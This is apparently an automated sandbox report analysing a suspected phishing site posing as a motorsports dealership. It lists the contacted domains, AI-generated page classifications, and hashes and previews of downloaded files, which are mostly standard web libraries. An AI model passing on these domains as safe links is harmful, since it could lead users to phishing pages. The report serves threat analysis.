                                                                            cdnjs.cloudflare.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.21.91.145
                                                                            cooklght.ruUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            IP
                                                                            192.168.2.16
                                                                            192.168.2.4
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1543707
                                                                            Start date and time:2024-10-28 09:35:09 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 3m 37s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:browseurl.jbs
                                                                            Sample URL:https://alinefrasca.sbs/pktcr/
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal60.phis.win@19/63@30/12
                                                                            EGA Information:Failed
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 142.250.186.35, 216.58.206.78, 173.194.76.84, 34.104.35.123, 4.245.163.56, 93.184.221.240, 13.85.23.206, 192.229.221.95, 2.23.209.154, 2.23.209.159, 2.23.209.162, 2.23.209.150, 2.23.209.157, 2.23.209.158, 2.23.209.163, 2.23.209.152, 2.23.209.155, 2.23.209.178, 2.23.209.179, 2.23.209.186, 2.23.209.177, 2.23.209.181, 2.23.209.185, 2.23.209.183, 2.23.209.180, 2.23.209.182, 104.18.186.31, 104.18.187.31, 2.23.209.168, 2.23.209.169, 2.23.209.160, 2.23.209.167, 2.23.209.164, 2.23.209.171, 172.217.18.10, 172.217.16.138, 142.250.185.74, 142.250.185.202, 142.250.181.234, 142.250.185.234, 142.250.186.138, 142.250.185.138, 142.250.185.170, 142.250.185.106, 142.250.186.42, 142.250.186.74, 142.250.74.202, 142.250.184.202, 142.250.186.106, 216.58.206.42, 142.250.185.227
                                                                            • Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, th.bing.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, th.bing.com.edgekey.net, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, p-th.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: https://alinefrasca.sbs/pktcr/
                                                                            No simulations
                                                                            InputOutput
                                                                            URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                                            ```json
                                                                            {
                                                                              "contains_trigger_text": true,
                                                                              "trigger_text": "Browser checks ongoing to maintain security.",
                                                                              "prominent_button_name": "unknown",
                                                                              "text_input_field_labels": "unknown",
                                                                              "pdf_icon_visible": false,
                                                                              "has_visible_captcha": false,
                                                                              "has_urgent_text": false,
                                                                              "has_visible_qrcode": false
                                                                            }
                                                                            URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                                            ```json
                                                                            {
                                                                              "brands": [
                                                                                "Cloudflare"
                                                                              ]
                                                                            }
                                                                            URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                                            ```json
                                                                            {
                                                                              "contains_trigger_text": false,
                                                                              "trigger_text": "unknown",
                                                                              "prominent_button_name": "Browse Inventory",
                                                                              "text_input_field_labels": [
                                                                                "Full Name",
                                                                                "Email",
                                                                                "Message"
                                                                              ],
                                                                              "pdf_icon_visible": false,
                                                                              "has_visible_captcha": false,
                                                                              "has_urgent_text": false,
                                                                              "has_visible_qrcode": false
                                                                            }
                                                                            URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                                            ```json
                                                                            {
                                                                              "brands": [
                                                                                "Adrenaline Rush Motorsports"
                                                                              ]
                                                                            }
                                                                            URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                                            ```json
                                                                            {
                                                                              "contains_trigger_text": false,
                                                                              "trigger_text": "unknown",
                                                                              "prominent_button_name": "Browse Inventory",
                                                                              "text_input_field_labels": "unknown",
                                                                              "pdf_icon_visible": false,
                                                                              "has_visible_captcha": false,
                                                                              "has_urgent_text": false,
                                                                              "has_visible_qrcode": false
                                                                            }
                                                                            URL: https://alinefrasca.sbs/pktcr/ Model: gpt-4o
                                                                            ```json{  "legit_domain": "adrenalinerushmotorsports.com",  "classification": "unknown",  "reasons": [    "The brand 'Adrenaline Rush Motorsports' is not widely recognized, making it difficult to classify as 'known' or 'wellknown'.",    "The URL 'alinefrasca.sbs' does not match the expected domain for 'Adrenaline Rush Motorsports'.",    "The domain extension '.sbs' is unusual and not typically associated with legitimate business websites.",    "There is no clear association between the brand and the provided URL, which raises suspicion.",    "The URL does not contain any recognizable elements of the brand name, which is a common phishing tactic."  ],  "riskscore": 8}
                                                                            URL: alinefrasca.sbs
                                                                                        Brands: Adrenaline Rush Motorsports
                                                                                        Input Fields: Full Name, Email, Message
                                                                            URL: https://alinefrasca.sbs/pktcr/ Model: claude-3-haiku-20240307
                                                                            ```json
                                                                            {
                                                                              "brands": [
                                                                                "Adrenaline Rush Motorsports",
                                                                                "Buick"
                                                                              ]
                                                                            }
                                                                            URL: https://cooklght.ru//#inventory Model: claude-3-haiku-20240307
                                                                            ```json
                                                                            {
                                                                              "contains_trigger_text": false,
                                                                              "trigger_text": "unknown",
                                                                              "prominent_button_name": "Browse Inventory",
                                                                              "text_input_field_labels": "unknown",
                                                                              "pdf_icon_visible": false,
                                                                              "has_visible_captcha": false,
                                                                              "has_urgent_text": false,
                                                                              "has_visible_qrcode": false
                                                                            }
                                                                            URL: https://cooklght.ru//#inventory Model: claude-3-haiku-20240307
                                                                            ```json
                                                                            {
                                                                              "brands": [
                                                                                "Adrenaline Rush Motorsports"
                                                                              ]
                                                                            }
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x326, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):27038
                                                                            Entropy (8bit):7.95786742037286
                                                                            Encrypted:false
                                                                            SSDEEP:768:4KNCx5UTKADS3RmtoE76iAyzuF2jmwsHPk8z:4KNCceWSItCKC2jwz
                                                                            MD5:FF3184EDD12CCE435416A42E7C46E94C
                                                                            SHA1:88D969AC1EB51559B68FB7B918FB3DCFB12EF5FF
                                                                            SHA-256:4FEE8226CB8FA3DB108E49A59FF56A8ABA08C0B263BAE2DAF0AF5D6863F8A72A
                                                                            SHA-512:0885FFCF75A1E0C0865A632933572B32803866AC18A7EB8AF93EACB16807BCAC8857D676E7B6D1B7FB17C380C33763A1083A42276156B714FE3410FDD64FB0A1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://th.bing.com/th/id/OIP.3ZzJlBGj6q6AJwIxYkHHiAHaFG
                                                                            Preview:......JFIF.............BExif..MM.*.......i................@........M..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......F...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...g4.......A...j.R*..,.....-".S@.N.*2?J.,..d.....c...'.F.+.....~j...........p.._...}.R..l,.)...........mr.H.\0. .e=..z.R.</u.....M........Q....=;...L...9....+..5.k..[I.D8,..}En.s.......P"j(...(...(....F.-....?.!...Z..".q.6I...#v+}.....;.....KxB.e(.....4.....N?0*@......:.....&~.o...4.|...G...?......
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x326, components 3
                                                                            Category:dropped
                                                                            Size (bytes):27038
                                                                            Entropy (8bit):7.95786742037286
                                                                            Encrypted:false
                                                                            SSDEEP:768:4KNCx5UTKADS3RmtoE76iAyzuF2jmwsHPk8z:4KNCceWSItCKC2jwz
                                                                            MD5:FF3184EDD12CCE435416A42E7C46E94C
                                                                            SHA1:88D969AC1EB51559B68FB7B918FB3DCFB12EF5FF
                                                                            SHA-256:4FEE8226CB8FA3DB108E49A59FF56A8ABA08C0B263BAE2DAF0AF5D6863F8A72A
                                                                            SHA-512:0885FFCF75A1E0C0865A632933572B32803866AC18A7EB8AF93EACB16807BCAC8857D676E7B6D1B7FB17C380C33763A1083A42276156B714FE3410FDD64FB0A1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:......JFIF.............BExif..MM.*.......i................@........M..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......F...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...g4.......A...j.R*..,.....-".S@.N.*2?J.,..d.....c...'.F.+.....~j...........p.._...}.R..l,.)...........mr.H.\0. .e=..z.R.</u.....M........Q....=;...L...9....+..5.k..[I.D8,..}En.s.......P"j(...(...(....F.-....?.!...Z..".q.6I...#v+}.....;.....KxB.e(.....4.....N?0*@......:.....&~.o...4.|...G...?......
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (1238)
                                                                            Category:downloaded
                                                                            Size (bytes):1239
                                                                            Entropy (8bit):5.068464054671174
                                                                            Encrypted:false
                                                                            SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                                                                            MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                            SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                            SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                            SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://cooklght.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                                            Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (47671)
                                                                            Category:downloaded
                                                                            Size (bytes):47672
                                                                            Entropy (8bit):5.4016434300784555
                                                                            Encrypted:false
                                                                            SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUen+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3Uesnpj
                                                                            MD5:EC4B20037C896C5F60640105C6EA36B1
                                                                            SHA1:A9A74169679305B6EF1B76470F5CB746D9420213
                                                                            SHA-256:FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
                                                                            SHA-512:1AD0209E6BEFE4444E62BFD01EA8FC5302674A047313908E963AFB787D83E572DB6AEF7EFEBB6D294A0310DECD51E54C17ACE28E7CDF651BB588AE4A17030102
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/e1a56f38220d/api.js
                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 116672, version 773.256
                                                                            Category:downloaded
                                                                            Size (bytes):116672
                                                                            Entropy (8bit):7.9897401211491745
                                                                            Encrypted:false
                                                                            SSDEEP:3072:y+cQdfEX4HdgCsxZhk8minCk+uU254aiRt3kLVzLm/j+G01Z:KQdfjIiib+uUe1EK66G4
                                                                            MD5:0474CCD4D3EC29857F1E7F8B9C56DF8B
                                                                            SHA1:3E8F0F46B2949DCC309F65FFF1372B9A05E8F480
                                                                            SHA-256:B66B3DA5FF7B2DB79B6CB5A22C3E762E2BF16958A11987E69EEB1980BBBCDFB0
                                                                            SHA-512:2AB61A54EE830519D0AACBA1E12F1AD920AEDDDEA8E682CEBE51BEC78ECD7BBC403343F8E00B45AFE804A954A52EB5DCC70983BB01239C36422F8E6F18E0BB5E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2
                                                                            Preview:wOF2...................s.........................6.$. .`..H..V....L.... %H.qj..0=....yPF.....PUUO.a^..* ...o...o.........; ..o..~..u../..b...Y.u*.K......2..w.._..p.....1.n/...../F..t....O.e..:.....?..........B.U...4...G".@7...J.I.TZB......3..;.....c.5i-m.8.Z.:.&..iS..'.G.G...........~....>D.U....,.................%.d.1...p.8a'...h.Q..0Tp.J....)&)q.......9W.D.Z...f..{.{...[g.5.v..E4y...DCt..1b|./.....$.......$.'Y..m.,.......t...,6...Ni...)!f..-O.> '?..........L2....eDW.e..cY......*..B......-5../f...i......3.ai$.%[6.K..`..a.x...;.L.qN]vy...oC....g.:.3...I...d....Z....{+..@.eFV...92F.u...Vi..9...}...y.=..=r.=".?"s.=".?2..3..Lr".(Z....$..@....R.{&..#...L...0..h......H.-A.Y.$.`k..U.49Z,.f..Y'..`.f.f5..lVB(.2+p.[.@*...*......aCf...........F.Y...:kU-k.0....._.:..d8.,.$6.......ld29.....{.y..!..UF#..`P........M.....~.~.......FE+....W..a%......*j....j.=........y..~Y...=..]?.&......<...o.{....t....8.,......E ..%.@.E..G.h....Y.}.~d...5./...m4....r.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x326, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):28981
                                                                            Entropy (8bit):7.942807078434849
                                                                            Encrypted:false
                                                                            SSDEEP:768:4IArbaHkq5++0nfwkuH2d/RXFmLmBo0ZVH+A8U+2:4DrbikPokuK/Tm4ZVeA8y
                                                                            MD5:4C2BC1F13C4375B56501474AA71D5590
                                                                            SHA1:F41320C18B51311BDC55722D090AF266AD6CC0CD
                                                                            SHA-256:E7BB24209BE1491270512C7020C2A1C5948B43F4742EF55869D6183A7B893B69
                                                                            SHA-512:EB68B363338B1ECA8199E38B2ED5061EA748A7C8B14B42A30407DF9A8ED20AA527E16C03AFFC5337ED3A7A2F5B28E82CB71179A071F93448B1E49A58C248A4FC
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://th.bing.com/th/id/OIP.mv6F7d7V6_8y3vquvKp48QHaFG
                                                                            Preview:......JFIF.............BExif..MM.*.......i................@........M..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......F...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..:.E?......o,...K...X.....n.U.....?Z..D.$.u.L.+..0...G>......w,O...O.y..l...,.w..m..$....swC...G9.....q...Y.,|...>."J.9.#.........$..T...7..).A...(.SRN0..k.........._..$...Y..../5..>..{....G.....;._...&q.9..5....3.m?x..t..>.....H...DI1..6jQ.[[...5.lt\. ....'`=.......&IG.*.2:.k.]g.=.O.u...J...0a
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 83 x 10, 8-bit/color RGB, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):61
                                                                            Entropy (8bit):3.990210155325004
                                                                            Encrypted:false
                                                                            SSDEEP:3:yionv//thPlStt4pAkxl/k4E08up:6v/lhPkApAk7Tp
                                                                            MD5:5DFEE0465FB1586F6BDA977018D193F8
                                                                            SHA1:A1A2287FCE61A9911D94AFD47932E07B24B919AE
                                                                            SHA-256:6742F1BAA1DCBD7F0744D62584C86FBB910FAB0312F46E99AE51C07EF9E729D9
                                                                            SHA-512:C9A0DA66CCFF720ACC626152CEA81F7A616A79FC5F52679E8F087B51EF532211C7A44F1F442DF6806220E5145FC4D90BACFC1E00DB19748A6C750C8F5EF1352B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d9998e48bc0e98b/1730104580520/7FQTXkX5ZkBqsD6
                                                                            Preview:.PNG........IHDR...S.........GQ.h....IDAT.....$.....IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):7476
                                                                            Entropy (8bit):4.727012908410122
                                                                            Encrypted:false
                                                                            SSDEEP:96:DG7EFvjyAP8CVBkNQmgY9uhaznjQsILJBPjwY:i7EFf8Cj9muhaz4JJwY
                                                                            MD5:A1DA4BC4CEA6F8CD75B5126256AFFB48
                                                                            SHA1:C2BB6BCEE6FC9FDCFEABE162EB36723ACF15284D
                                                                            SHA-256:3510992C6E38E925B3FEE601CF3E01DFEA78920F9315B2207F28C3534B4DDD61
                                                                            SHA-512:30B5E2A2690EC86A74015FDC024F2812B0B32B6BEFC6B3A7CD8E659DEF59AEA114BF0733A5E5358D49D3DF58156971E6A2181F0C4F81852025A77CA6CD7C4B65
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://cooklght.ru//
                                                                            Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Adrenaline Rush Motorsports - cooklght.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top">.. <div class="container">.. <a class="navbar-brand fw-bold" href="https://cooklght.ru//">.. <i class="fas fa-car"></i> Adrenaline Rush Motorsports - AutoShowroom.. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">.. <span class
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x326, components 3
                                                                            Category:dropped
                                                                            Size (bytes):38064
                                                                            Entropy (8bit):7.9700315702822015
                                                                            Encrypted:false
                                                                            SSDEEP:768:kinzqwXawUnHo6Awgu30Xo/NwARkIhptibfNBr0DFn:k+ZaweImgI0E+8kqpclBk
                                                                            MD5:18C026D2334E1F64C019DF0E98877B8D
                                                                            SHA1:EF64567EBEBD046F2E59D007D7AE08624B2C4791
                                                                            SHA-256:577CC4A6AB7D35FB0E27ADC5E0146B655B670A146F8DDAFD0465E578152B4433
                                                                            SHA-512:67EE10224F3044D90F6978A0C53B0E398F9F1814DDA85285EA8C66AD52FB4DA81062C6DD50C820062C4CFA918DBEEC36BD1CC58A354129630B3CE8775428F036
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:......JFIF.............BExif..MM.*.......i................@........A..@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......F...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....o..l.li.H...u..8Q..1>........v...!F..!.........u..Z...!l?...pJ...5N.T.dDa.g.)l.l.$.v.2.,.8V........C..%.;I*.#..ree].q.V.X^.4...bUF...-..5..b..7,.+o.[Y.....F;@.FMt.j.W6/m.....%xH.n....eRIr..;#5k.U....D..o.L.@v...R...1V..f.b.%......\.7..[...o..h.G..JG.(~.g.*........7-.R...........V.k...FW6.x.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):47992
                                                                            Entropy (8bit):5.605846858683577
                                                                            Encrypted:false
                                                                            SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                            MD5:CF3402D7483B127DED4069D651EA4A22
                                                                            SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                            SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                            SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1249
                                                                            Entropy (8bit):5.242453121762845
                                                                            Encrypted:false
                                                                            SSDEEP:24:hYYIzD6yJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rq6Kj2CZLY5Mc6NDLYzkYKLlOM
                                                                            MD5:F58515DFE987F7E027C8A71BBC884621
                                                                            SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                                                                            SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                                                                            SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://alinefrasca.sbs/favicon.ico
                                                                            Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x326, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):32005
                                                                            Entropy (8bit):7.953237818333613
                                                                            Encrypted:false
                                                                            SSDEEP:768:5mOkhGa/rNmB3GD0Ct5iUqfMgpEfyM9D2RzCe/5DTLzivoDr:5gDC3GDtIUqbpW9oGw/Lz0w
                                                                            MD5:5D9B66FA5D346DC731DE014DABB8ACE8
                                                                            SHA1:E0ED14091806DC1CA58D7D546112A34D7F94670D
                                                                            SHA-256:BDB7F262E3A524468F238903AF01C58C252EF46A89245ADAA1F0077E13BD4CDC
                                                                            SHA-512:264694C3C87844CD3EE170ABE2EBAE3FEC755AC67A4775D5E3A50FAB1E4676C3AEDFBC4F86F9237D7AFB4637DFFED3903A6F50AA91C3693CCBF8E2C8E29B6A0D
                                                                            Malicious:false
